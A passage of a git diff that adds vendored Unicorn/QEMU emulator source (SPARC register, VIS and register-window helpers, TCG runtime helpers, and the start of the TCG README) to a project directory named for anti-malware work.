UC_SPARC_REG_I0]; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.pc; + break; + } + } + } + + return 0; +} + +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint64_t *)value; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + SPARC_CPU(uc, mycpu)->env.pc = *(uint64_t *)value; + SPARC_CPU(uc, mycpu)->env.npc = *(uint64_t *)value + 4; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +void sparc64_uc_init(struct uc_struct* uc) +{ + register_accel_types(uc); + sparc_cpu_register_types(uc); + sun4u_machine_init(uc); + uc->reg_read = sparc_reg_read; + uc->reg_write = sparc_reg_write; + uc->reg_reset = sparc_reg_reset; + uc->set_pc = sparc_set_pc; + uc->stop_interrupt = sparc_stop_interrupt; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c new file mode 100644 index 0000000..383cc8b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c @@ -0,0 +1,489 @@ +/* + * VIS op helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* This function uses non-native bit order */ +#define GET_FIELD(X, FROM, TO) \ + ((X) >> (63 - (TO)) & ((1ULL << ((TO) - (FROM) + 1)) - 1)) + +/* This function uses the order in the manuals, i.e. bit 0 is 2^0 */ +#define GET_FIELD_SP(X, FROM, TO) \ + GET_FIELD(X, 63 - (TO), 63 - (FROM)) + +target_ulong helper_array8(target_ulong pixel_addr, target_ulong cubesize) +{ + return (GET_FIELD_SP(pixel_addr, 60, 63) << (17 + 2 * cubesize)) | + (GET_FIELD_SP(pixel_addr, 39, 39 + cubesize - 1) << (17 + cubesize)) | + (GET_FIELD_SP(pixel_addr, 17 + cubesize - 1, 17) << 17) | + (GET_FIELD_SP(pixel_addr, 56, 59) << 13) | + (GET_FIELD_SP(pixel_addr, 35, 38) << 9) | + (GET_FIELD_SP(pixel_addr, 13, 16) << 5) | + (((pixel_addr >> 55) & 1) << 4) | + (GET_FIELD_SP(pixel_addr, 33, 34) << 2) | + GET_FIELD_SP(pixel_addr, 11, 12); +} + +#ifdef HOST_WORDS_BIGENDIAN +#define VIS_B64(n) b[7 - (n)] +#define VIS_W64(n) w[3 - (n)] +#define VIS_SW64(n) sw[3 - (n)] +#define VIS_L64(n) l[1 - (n)] +#define VIS_B32(n) b[3 - (n)] +#define VIS_W32(n) w[1 - (n)] +#else +#define VIS_B64(n) b[n] +#define VIS_W64(n) w[n] +#define VIS_SW64(n) sw[n] +#define VIS_L64(n) l[n] +#define VIS_B32(n) b[n] +#define VIS_W32(n) w[n] +#endif + +typedef union { + uint8_t b[8]; + uint16_t w[4]; + int16_t sw[4]; + uint32_t l[2]; + uint64_t ll; + float64 d; +} VIS64; + +typedef union { + uint8_t b[4]; + uint16_t w[2]; + uint32_t l; + float32 f; +} VIS32; + +uint64_t helper_fpmerge(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + + s.ll = src1; + d.ll = src2; + + /* Reverse calculation order to handle overlap */ + d.VIS_B64(7) = s.VIS_B64(3); + d.VIS_B64(6) = d.VIS_B64(3); + d.VIS_B64(5) = s.VIS_B64(2); + d.VIS_B64(4) = d.VIS_B64(2); + d.VIS_B64(3) = s.VIS_B64(1); + d.VIS_B64(2) = d.VIS_B64(1); + d.VIS_B64(1) = s.VIS_B64(0); + /* d.VIS_B64(0) = d.VIS_B64(0); */ + + return d.ll; +} + +uint64_t helper_fmul8x16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8x16al(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(1) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8x16au(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(0) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8sux16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8ulx16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmuld8sux16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_L64(r) = tmp; + + /* Reverse calculation order to handle overlap */ + PMUL(1); + PMUL(0); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmuld8ulx16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_L64(r) = tmp; + + /* Reverse calculation order to handle overlap */ + PMUL(1); + PMUL(0); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fexpand(uint64_t src1, uint64_t src2) +{ + VIS32 s; + VIS64 d; + + s.l = (uint32_t)src1; + d.ll = src2; + d.VIS_W64(0) = s.VIS_B32(0) << 4; + d.VIS_W64(1) = s.VIS_B32(1) << 4; + d.VIS_W64(2) = s.VIS_B32(2) << 4; + d.VIS_W64(3) = s.VIS_B32(3) << 4; + + return d.ll; +} + +#define VIS_HELPER(name, F) \ + uint64_t name##16(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_W64(0) = F(d.VIS_W64(0), s.VIS_W64(0)); \ + d.VIS_W64(1) = F(d.VIS_W64(1), s.VIS_W64(1)); \ + d.VIS_W64(2) = F(d.VIS_W64(2), s.VIS_W64(2)); \ + d.VIS_W64(3) = F(d.VIS_W64(3), s.VIS_W64(3)); \ + \ + return d.ll; \ + } \ + \ + uint32_t name##16s(uint32_t src1, uint32_t src2) \ + { \ + VIS32 s, d; \ + \ + s.l = src1; \ + d.l = src2; \ + \ + d.VIS_W32(0) = F(d.VIS_W32(0), s.VIS_W32(0)); \ + d.VIS_W32(1) = F(d.VIS_W32(1), s.VIS_W32(1)); \ + \ + return d.l; \ + } \ + \ + uint64_t name##32(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_L64(0) = F(d.VIS_L64(0), s.VIS_L64(0)); \ + d.VIS_L64(1) = F(d.VIS_L64(1), s.VIS_L64(1)); \ + \ + return d.ll; \ + } \ + \ + uint32_t name##32s(uint32_t src1, uint32_t src2) \ + { \ + VIS32 s, d; \ + \ + s.l = src1; \ + d.l = src2; \ + \ + d.l = F(d.l, s.l); \ + \ + return d.l; \ + } + +#define FADD(a, b) ((a) + (b)) +#define FSUB(a, b) ((a) - (b)) +VIS_HELPER(helper_fpadd, FADD) +VIS_HELPER(helper_fpsub, FSUB) + +#define VIS_CMPHELPER(name, F) \ + uint64_t name##16(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_W64(0) = F(s.VIS_W64(0), d.VIS_W64(0)) ? 1 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(1), d.VIS_W64(1)) ? 2 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(2), d.VIS_W64(2)) ? 4 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(3), d.VIS_W64(3)) ? 8 : 0; \ + d.VIS_W64(1) = d.VIS_W64(2) = d.VIS_W64(3) = 0; \ + \ + return d.ll; \ + } \ + \ + uint64_t name##32(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_L64(0) = F(s.VIS_L64(0), d.VIS_L64(0)) ? 1 : 0; \ + d.VIS_L64(0) |= F(s.VIS_L64(1), d.VIS_L64(1)) ? 2 : 0; \ + d.VIS_L64(1) = 0; \ + \ + return d.ll; \ + } + +#define FCMPGT(a, b) ((a) > (b)) +#define FCMPEQ(a, b) ((a) == (b)) +#define FCMPLE(a, b) ((a) <= (b)) +#define FCMPNE(a, b) ((a) != (b)) + +VIS_CMPHELPER(helper_fcmpgt, FCMPGT) +VIS_CMPHELPER(helper_fcmpeq, FCMPEQ) +VIS_CMPHELPER(helper_fcmple, FCMPLE) +VIS_CMPHELPER(helper_fcmpne, FCMPNE) + +uint64_t helper_pdist(uint64_t sum, uint64_t src1, uint64_t src2) +{ + int i; + for (i = 0; i < 8; i++) { + int s1, s2; + + s1 = (src1 >> (56 - (i * 8))) & 0xff; + s2 = (src2 >> (56 - (i * 8))) & 0xff; + + /* Absolute value of difference. */ + s1 -= s2; + if (s1 < 0) { + s1 = -s1; + } + + sum += s1; + } + + return sum; +} + +uint32_t helper_fpack16(uint64_t gsr, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0xf; + uint32_t ret = 0; + int byte; + + for (byte = 0; byte < 4; byte++) { + uint32_t val; + int16_t src = rs2 >> (byte * 16); + int32_t scaled = src << scale; + int32_t from_fixed = scaled >> 7; + + val = (from_fixed < 0 ? 0 : + from_fixed > 255 ? 255 : from_fixed); + + ret |= val << (8 * byte); + } + + return ret; +} + +uint64_t helper_fpack32(uint64_t gsr, uint64_t rs1, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0x1f; + uint64_t ret = 0; + int word; + + ret = (rs1 << 8) & ~(0x000000ff000000ffULL); + for (word = 0; word < 2; word++) { + uint64_t val; + int32_t src = rs2 >> (word * 32); + int64_t scaled = (int64_t)src << scale; + int64_t from_fixed = scaled >> 23; + + val = (from_fixed < 0 ? 0 : + (from_fixed > 255) ? 255 : from_fixed); + + ret |= val << (32 * word); + } + + return ret; +} + +uint32_t helper_fpackfix(uint64_t gsr, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0x1f; + uint32_t ret = 0; + int word; + + for (word = 0; word < 2; word++) { + uint32_t val; + int32_t src = rs2 >> (word * 32); + int64_t scaled = src << scale; + int64_t from_fixed = scaled >> 16; + + val = (from_fixed < -32768 ? -32768 : + from_fixed > 32767 ? 32767 : from_fixed); + + ret |= (val & 0xffff) << (word * 16); + } + + return ret; +} + +uint64_t helper_bshuffle(uint64_t gsr, uint64_t src1, uint64_t src2) +{ + union { + uint64_t ll[2]; + uint8_t b[16]; + } s; + VIS64 r; + uint32_t i, mask, host; + + /* Set up S such that we can index across all of the bytes. */ +#ifdef HOST_WORDS_BIGENDIAN + s.ll[0] = src1; + s.ll[1] = src2; + host = 0; +#else + s.ll[1] = src1; + s.ll[0] = src2; + host = 15; +#endif + mask = gsr >> 32; + + for (i = 0; i < 8; ++i) { + unsigned e = (mask >> (28 - i*4)) & 0xf; + r.VIS_B64(i) = s.b[e ^ host]; + } + + return r.ll; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c new file mode 100644 index 0000000..f077273 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c @@ -0,0 +1,392 @@ +/* + * Helpers for CWP and PSTATE handling + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +static inline void memcpy32(target_ulong *dst, const target_ulong *src) +{ + dst[0] = src[0]; + dst[1] = src[1]; + dst[2] = src[2]; + dst[3] = src[3]; + dst[4] = src[4]; + dst[5] = src[5]; + dst[6] = src[6]; + dst[7] = src[7]; +} + +void cpu_set_cwp(CPUSPARCState *env, int new_cwp) +{ + /* put the modified wrap registers at their proper location */ + if (env->cwp == env->nwindows - 1) { + memcpy32(env->regbase, env->regbase + env->nwindows * 16); + } + env->cwp = new_cwp; + + /* put the wrap registers at their temporary location */ + if (new_cwp == env->nwindows - 1) { + memcpy32(env->regbase + env->nwindows * 16, env->regbase); + } + env->regwptr = env->regbase + (new_cwp * 16); +} + +target_ulong cpu_get_psr(CPUSPARCState *env) +{ + helper_compute_psr(env); + +#if !defined(TARGET_SPARC64) + return env->version | (env->psr & PSR_ICC) | + (env->psref ? PSR_EF : 0) | + (env->psrpil << 8) | + (env->psrs ? PSR_S : 0) | + (env->psrps ? PSR_PS : 0) | + (env->psret ? PSR_ET : 0) | env->cwp; +#else + return env->psr & PSR_ICC; +#endif +} + +void cpu_put_psr(CPUSPARCState *env, target_ulong val) +{ + env->psr = val & PSR_ICC; +#if !defined(TARGET_SPARC64) + env->psref = (val & PSR_EF) ? 1 : 0; + env->psrpil = (val & PSR_PIL) >> 8; +#endif +#if ((!defined(TARGET_SPARC64)) && !defined(CONFIG_USER_ONLY)) + //cpu_check_irqs(env); +#endif +#if !defined(TARGET_SPARC64) + env->psrs = (val & PSR_S) ? 1 : 0; + env->psrps = (val & PSR_PS) ? 1 : 0; + env->psret = (val & PSR_ET) ? 1 : 0; + cpu_set_cwp(env, val & PSR_CWP); +#endif + env->cc_op = CC_OP_FLAGS; +} + +int cpu_cwp_inc(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp >= env->nwindows)) { + cwp -= env->nwindows; + } + return cwp; +} + +int cpu_cwp_dec(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp < 0)) { + cwp += env->nwindows; + } + return cwp; +} + +#ifndef TARGET_SPARC64 +void helper_rett(CPUSPARCState *env) +{ + unsigned int cwp; + + if (env->psret == 1) { + helper_raise_exception(env, TT_ILL_INSN); + } + + env->psret = 1; + cwp = cpu_cwp_inc(env, env->cwp + 1) ; + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_UNF); + } + cpu_set_cwp(env, cwp); + env->psrs = env->psrps; +} + +/* XXX: use another pointer for %iN registers to avoid slow wrapping + handling ? */ +void helper_save(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_dec(env, env->cwp - 1); + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_OVF); + } + cpu_set_cwp(env, cwp); +} + +void helper_restore(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_inc(env, env->cwp + 1); + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_UNF); + } + cpu_set_cwp(env, cwp); +} + +void helper_wrpsr(CPUSPARCState *env, target_ulong new_psr) +{ + if ((new_psr & PSR_CWP) >= env->nwindows) { + helper_raise_exception(env, TT_ILL_INSN); + } else { + cpu_put_psr(env, new_psr); + } +} + +target_ulong helper_rdpsr(CPUSPARCState *env) +{ + return cpu_get_psr(env); +} + +#else +/* XXX: use another pointer for %iN registers to avoid slow wrapping + handling ? */ +void helper_save(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_dec(env, env->cwp - 1); + if (env->cansave == 0) { + helper_raise_exception(env, TT_SPILL | (env->otherwin != 0 ? + (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } else { + if (env->cleanwin - env->canrestore == 0) { + /* XXX Clean windows without trap */ + helper_raise_exception(env, TT_CLRWIN); + } else { + env->cansave--; + env->canrestore++; + cpu_set_cwp(env, cwp); + } + } +} + +void helper_restore(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_inc(env, env->cwp + 1); + if (env->canrestore == 0) { + helper_raise_exception(env, TT_FILL | (env->otherwin != 0 ? + (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } else { + env->cansave++; + env->canrestore--; + cpu_set_cwp(env, cwp); + } +} + +void helper_flushw(CPUSPARCState *env) +{ + if (env->cansave != env->nwindows - 2) { + helper_raise_exception(env, TT_SPILL | (env->otherwin != 0 ? + (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } +} + +void helper_saved(CPUSPARCState *env) +{ + env->cansave++; + if (env->otherwin == 0) { + env->canrestore--; + } else { + env->otherwin--; + } +} + +void helper_restored(CPUSPARCState *env) +{ + env->canrestore++; + if (env->cleanwin < env->nwindows - 1) { + env->cleanwin++; + } + if (env->otherwin == 0) { + env->cansave--; + } else { + env->otherwin--; + } +} + +target_ulong cpu_get_ccr(CPUSPARCState *env) +{ + target_ulong psr; + + psr = cpu_get_psr(env); + + return ((env->xcc >> 20) << 4) | ((psr & PSR_ICC) >> 20); +} + +void cpu_put_ccr(CPUSPARCState *env, target_ulong val) +{ + env->xcc = (val >> 4) << 20; + env->psr = (val & 0xf) << 20; + CC_OP = CC_OP_FLAGS; +} + +target_ulong cpu_get_cwp64(CPUSPARCState *env) +{ + return env->nwindows - 1 - env->cwp; +} + +void cpu_put_cwp64(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp >= env->nwindows || cwp < 0)) { + cwp %= env->nwindows; + } + cpu_set_cwp(env, env->nwindows - 1 - cwp); +} + +target_ulong helper_rdccr(CPUSPARCState *env) +{ + return cpu_get_ccr(env); +} + +void helper_wrccr(CPUSPARCState *env, target_ulong new_ccr) +{ + cpu_put_ccr(env, new_ccr); +} + +/* CWP handling is reversed in V9, but we still use the V8 register + order. */ +target_ulong helper_rdcwp(CPUSPARCState *env) +{ + return cpu_get_cwp64(env); +} + +void helper_wrcwp(CPUSPARCState *env, target_ulong new_cwp) +{ + cpu_put_cwp64(env, new_cwp); +} + +static inline uint64_t *get_gregset(CPUSPARCState *env, uint32_t pstate) +{ + switch (pstate) { + default: + //trace_win_helper_gregset_error(pstate); + /* pass through to normal set of global registers */ + case 0: + return env->bgregs; + case PS_AG: + return env->agregs; + case PS_MG: + return env->mgregs; + case PS_IG: + return env->igregs; + } +} + +void cpu_change_pstate(CPUSPARCState *env, uint32_t new_pstate) +{ + uint32_t pstate_regs, new_pstate_regs; + uint64_t *src, *dst; + + if (env->def->features & CPU_FEATURE_GL) { + /* PS_AG is not implemented in this case */ + new_pstate &= ~PS_AG; + } + + pstate_regs = env->pstate & 0xc01; + new_pstate_regs = new_pstate & 0xc01; + + if (new_pstate_regs != pstate_regs) { + //trace_win_helper_switch_pstate(pstate_regs, new_pstate_regs); + + /* Switch global register bank */ + src = get_gregset(env, new_pstate_regs); + dst = get_gregset(env, pstate_regs); + memcpy32(dst, env->gregs); + memcpy32(env->gregs, src); + } else { + //trace_win_helper_no_switch_pstate(new_pstate_regs); + } + env->pstate = new_pstate; +} + +void helper_wrpstate(CPUSPARCState *env, target_ulong new_state) +{ + cpu_change_pstate(env, new_state & 0xf3f); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_wrpil(CPUSPARCState *env, target_ulong new_pil) +{ +#if !defined(CONFIG_USER_ONLY) + //trace_win_helper_wrpil(env->psrpil, (uint32_t)new_pil); + + env->psrpil = new_pil; + + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_done(CPUSPARCState *env) +{ + trap_state *tsptr = cpu_tsptr(env); + + env->pc = tsptr->tnpc; + env->npc = tsptr->tnpc + 4; + cpu_put_ccr(env, tsptr->tstate >> 32); + env->asi = (tsptr->tstate >> 24) & 0xff; + cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); + cpu_put_cwp64(env, tsptr->tstate & 0xff); + env->tl--; + + //trace_win_helper_done(env->tl); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_retry(CPUSPARCState *env) +{ + trap_state *tsptr = cpu_tsptr(env); + + env->pc = tsptr->tpc; + env->npc = tsptr->tnpc; + cpu_put_ccr(env, tsptr->tstate >> 32); + env->asi = (tsptr->tstate >> 24) & 0xff; + cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); + cpu_put_cwp64(env, tsptr->tstate & 0xff); + env->tl--; + + //trace_win_helper_retry(env->tl); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c new file mode 100644 index 0000000..21b022a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c @@ -0,0 +1,109 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "unicorn/platform.h" +#include "qemu/host-utils.h" + +/* This file is compiled once, and thus we can't include the standard + "exec/helper-proto.h", which has includes that are target specific. */ + +#include "exec/helper-head.h" + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ + dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2)); + +#include "tcg-runtime.h" + + +/* 32-bit helpers */ + +int32_t HELPER(div_i32)(int32_t arg1, int32_t arg2) +{ + return arg1 / arg2; +} + +int32_t HELPER(rem_i32)(int32_t arg1, int32_t arg2) +{ + return arg1 % arg2; +} + +uint32_t HELPER(divu_i32)(uint32_t arg1, uint32_t arg2) +{ + return arg1 / arg2; +} + +uint32_t HELPER(remu_i32)(uint32_t arg1, uint32_t arg2) +{ + return arg1 % arg2; +} + +/* 64-bit helpers */ + +uint64_t HELPER(shl_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 << arg2; +} + +uint64_t HELPER(shr_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 >> arg2; +} + +int64_t HELPER(sar_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 >> arg2; +} + +int64_t HELPER(div_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 / arg2; +} + +int64_t HELPER(rem_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 % arg2; +} + +uint64_t HELPER(divu_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 / arg2; +} + +uint64_t HELPER(remu_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 % arg2; +} + +uint64_t HELPER(muluh_i64)(uint64_t arg1, uint64_t arg2) +{ + uint64_t l, h; + mulu64(&l, &h, arg1, arg2); + return h; +} + +int64_t HELPER(mulsh_i64)(int64_t arg1, int64_t arg2) +{ + uint64_t l, h; + muls64(&l, &h, arg1, arg2); + return h; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE new file mode 100644 index 0000000..be817fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE @@ -0,0 +1,3 @@ +All the files in this directory and subdirectories are released under +a BSD like license (see header in each file). No other license is +accepted. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README new file mode 100644 index 0000000..a550ff1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README @@ -0,0 +1,551 @@ +Tiny Code Generator - Fabrice Bellard. + +1) Introduction + +TCG (Tiny Code Generator) began as a generic backend for a C +compiler. It was simplified to be used in QEMU. It also has its roots +in the QOP code generator written by Paul Brook. + +2) Definitions + +The TCG "target" is the architecture for which we generate the +code. It is of course not the same as the "target" of QEMU which is +the emulated architecture. As TCG started as a generic C backend used +for cross compiling, it is assumed that the TCG target is different +from the host, although it is never the case for QEMU. + +In this document, we use "guest" to specify what architecture we are +emulating; "target" always means the TCG target, the machine on which +we are running QEMU. + +A TCG "function" corresponds to a QEMU Translated Block (TB). + +A TCG "temporary" is a variable only live in a basic +block. Temporaries are allocated explicitly in each function. + +A TCG "local temporary" is a variable only live in a function. Local +temporaries are allocated explicitly in each function. + +A TCG "global" is a variable which is live in all the functions +(equivalent of a C global variable). They are defined before the +functions defined. A TCG global can be a memory location (e.g. a QEMU +CPU register), a fixed host register (e.g. the QEMU CPU state pointer) +or a memory location which is stored in a register outside QEMU TBs +(not implemented yet). + +A TCG "basic block" corresponds to a list of instructions terminated +by a branch instruction. + +An operation with "undefined behavior" may result in a crash. + +An operation with "unspecified behavior" shall not crash. However, +the result may be one of several possibilities so may be considered +an "undefined result". + +3) Intermediate representation + +3.1) Introduction + +TCG instructions operate on variables which are temporaries, local +temporaries or globals. TCG instructions and variables are strongly +typed. Two types are supported: 32 bit integers and 64 bit +integers. Pointers are defined as an alias to 32 bit or 64 bit +integers depending on the TCG target word size. + +Each instruction has a fixed number of output variable operands, input +variable operands and always constant operands. + +The notable exception is the call instruction which has a variable +number of outputs and inputs. + +In the textual form, output operands usually come first, followed by +input operands, followed by constant operands. The output type is +included in the instruction name. Constants are prefixed with a '$'. + +add_i32 t0, t1, t2 (t0 <- t1 + t2) + +3.2) Assumptions + +* Basic 